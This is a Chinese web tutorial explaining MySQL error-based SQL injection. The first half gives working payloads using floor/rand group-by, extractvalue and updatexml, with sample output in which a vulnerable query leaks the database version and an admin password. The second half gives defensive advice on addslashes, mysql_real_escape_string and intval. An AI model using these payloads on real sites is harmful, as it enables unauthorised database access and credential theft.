用户名:
密 码: 记住
您当前的位置:首页 > 网络编程 > mysql教程

mysql数据中常用注入错模式利用详解

时间:2015-01-23  来源:西部数据  作者:西部数据

1、通过floor报错,可以通过如下一些利用代码:

  1. and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); 
  2.  
  3. and (select count(*) from (select 1 union select null union select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2))); 

举例如下,首先进行正常查询,代码如下:

  1. mysql> select * from article where id = 1; 
  2. +----+-------+---------+ 
  3. | id | title | content | 
  4. +----+-------+---------+ 
  5. |  1 | test  | do it   | 
  6.  
  7.  
  8. +----+-------+---------+ 

假如id输入存在注入的话,可以通过如下语句进行报错,代码如下:

  1. mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a); 
  2. ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key' 

可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询.

例如我们需要查询管理员用户名和密码,代码如下:

  1. Method1: 
  2.  
  3. mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a); 
  4. ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key' 
  5.  
  6. Method2: 
  7.  
  8. mysql> select * from article where id = 1 and (select count(*)  from (select 1 union select null union select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2))); 
  9. ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key' 

2、ExtractValue,测试语句如下:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程,代码如下:

  1. mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));-- 
  2. ERROR 1105 (HY000): XPATH syntax error: 'admin888' 

3、UpdateXml,测试语句,代码如下:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

实际测试过程,代码如下:

  1. mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,(select pass from admin limit 1),0x5e24),1)); 
  2. ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$' 

我们知道了注入原因,虽然国内很多PHP程序员仍在依靠addslashes防止SQL注入,还是建议大家加强中文防止SQL注入的检查。addslashes的问题在于黑客可以用0xbf27来代替单引号,而addslashes只是将0xbf27修改为0xbf5c27,成为一个有效的多字节字符,其中的0xbf5c仍会被看作是单引号,所以addslashes无法成功拦截。

当然addslashes也不是毫无用处,它是用于单字节字符串的处理,多字节字符还是用mysql_real_escape_string吧.

另外对于php手册中get_magic_quotes_gpc的举例,代码如下:

  1. if (!get_magic_quotes_gpc()) { 
  2. $lastname = addslashes($_POST[‘lastname’]); 
  3. else { 
  4. $lastname = $_POST[‘lastname’]; 
  5. }//phpfensi.com 

最好对magic_quotes_gpc已经开放的情况下,还是对$_POST[’lastname’]进行检查一下,再说下mysql_real_escape_string和mysql_escape_string这2个函数的区别:

mysql_real_escape_string 必须在(PHP 4 >= 4.3.0, PHP 5)的情况下才能使用,否则只能用 mysql_escape_string,两者的区别是:mysql_real_escape_string 考虑到连接的当前字符集,而mysql_escape_string 不考虑.

总结一下:

* addslashes() 是强行加;

* mysql_real_escape_string() 会判断字符集,但是对PHP版本有要求.

* mysql_escape_string不考虑连接的当前字符集.

* 对于任何提交过来的数据我们都进行过滤,同时对于id注入我们直接使用intval( id )进行判断过滤.

来顶一下
返回首页
返回首页
推荐资讯
WiFi太不安全:7岁女孩11分钟内入侵公共网络 WiFi太不安全:7岁女孩11分钟内入侵近期刚刚发布研究说WiFi网络能获得人们手机里多少私人信息,
不服跑个分?人工智能也出现“刷分”乱象 不服跑个分?人工智能也出现“刷分2014年,人工智能领域突然爆发,成为了科研和科技创业的热门
相关文章
    无相关信息
栏目更新
栏目热门